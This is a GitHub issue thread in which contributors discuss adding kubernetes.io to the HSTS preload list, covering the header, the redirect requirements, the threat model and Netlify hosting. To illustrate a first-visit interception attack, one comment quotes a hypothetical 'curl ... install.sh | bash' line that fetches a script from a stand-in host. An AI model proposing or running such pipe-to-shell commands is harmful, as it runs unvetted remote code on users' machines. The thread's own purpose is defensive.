### ISSUE TITLE
Add kubernetes.io to the HSTS preload list

### ISSUE THREAD

**Issue by lgarron** [kubernetes/website#2644]
Since this is a Google project, the website should be hosted using HTTPS (already the case! :-) and preloaded for HSTS.

This mostly involves sending a header like `Strict-Transport-Security: max-age=63072000; includeSubDomains; preload` and getting redirects correct.
See https://hstspreload.org/ for details.

Note that the requirements for preloading require fixing #2371 in this case.

**Comment by meacer** [comment]
Note that if we do this, the www redirect won't work because we disable it for HSTS sites. So it needs to be fixed first. I know.

**Comment by lgarron** [comment]
> Note that if we do this, the www redirect won't work because we disable it for HSTS sites.

That's why the submission process will enforce it as a requirement. :-)

**Comment by lgarron** [comment]
Do I need to be a project member to un-mark as stale?
/remove-lifecycle stale

The site still doesn't serve an HSTS header, nor is preloaded:
https://hstspreload.org/?domain=kubernetes.io

**Comment by lgarron** [comment]
/remove-lifecycle stale

https://hstspreload.org/?domain=kubernetes.io

**Comment by lgarron** [comment]
/remove-lifecycle stale although I'm getting the impression at this point that website security is not a priority. :-P

**Comment by sftim** [comment]
@lgarron Is there a threat [model] that's important to bear in mind?

**Comment by lgarron** [comment]
> @lgarron Is there a threat [model] that's important to bear in mind?

The main one is securing the first visit from a given browser profile. https://scotthelme.co.uk/hsts-the-missing-link-in-tls/

If someone tells you "visit kubernetes.io" and you type it into your URL bar, that initial visit is not secured. This makes it fairly easy to intercept and modify the request in certain common scenarios where you'd be typing in the URL the first time, like coffee shop or conference WiFi.

Preloading HSTS completely mitigates that in all modern browsers!

**Comment by sftim** [comment]
What I'm thinking is: it's a static documentation and project website. I can see how an attacker could intervene to, for example, mislead you about what fields a Pod has. Are there attacks with more serious consequences? If mitigating those is important it'd affect the priority this gets.

**Comment by lgarron** [comment]
> What I'm thinking is: it's a static documentation and project website. I can see how an attacker could intervene to, for example, mislead you about what fields a Pod has. Are there attacks with more serious consequences? If mitigating those is important it'd affect the priority this gets.

Well, a user doesn't know what should be on the site when they first visit it. A more innocent change would be something that injects branding/ads/browsing session information that interferes with the site, possibly breaking some of the JS or layout.

A more targeted attack in this case might be to add a big line near the top saying:

> It's easy to get started with Kubernetes! Just run this:
>
>     curl "http://downloadkubernetes.notsketchy.io/install.sh" | bash

https://www.youtube.com/watch?v=YMfW1bfyGSY

**Comment by sftim** [comment]
@lgarron would you be willing to revise the issue description? Kubernetes started as a Google project but is now a CNCF project.

It's still fine for someone to open a PR proposing changes to address the concern raised in this issue.

**Comment by lgarron** [comment]
It's not quite clear to me if I can make a PR for this.

Do I understand correctly that this is hosted using Netlify?
https://docs.netlify.com/domains-https/https-ssl/#hsts-preload

If so, does https://github.com/kubernetes/website/blob/b64b4c9b3ad10efa94f9633138fc1afaaa7a7310/config.toml#L59 imply that the header can be added to https://github.com/kubernetes/website/blob/master/config.toml ? https://kubernetes.io seems to be sending `strict-transport-security: max-age=31536000` to some clients, but this does not appear to be configured in the repository. I don't really have any way to test whether there is a potential contribution inside this repo to fix this. :-(

**Comment by sftim** [comment]
To change the headers that Netlify uses to serve pages on this site, I think you'd add the headers to https://github.com/kubernetes/website/blob/master/layouts/index.headers @lgarro, so that the Hugo build process renders that into `_headers`.

I also see a `strict-transport-security` header already set. I'd be happy to see a PR go in to add the `preload` part; the `includeSubdomains` should be fine too, but needs more careful checking because once preloaded it's hard to ever take it off. Possibly there is some plain-HTTP use inside kubernetes.io that is not widely known.

How did you feel about revising the issue description, by the way?
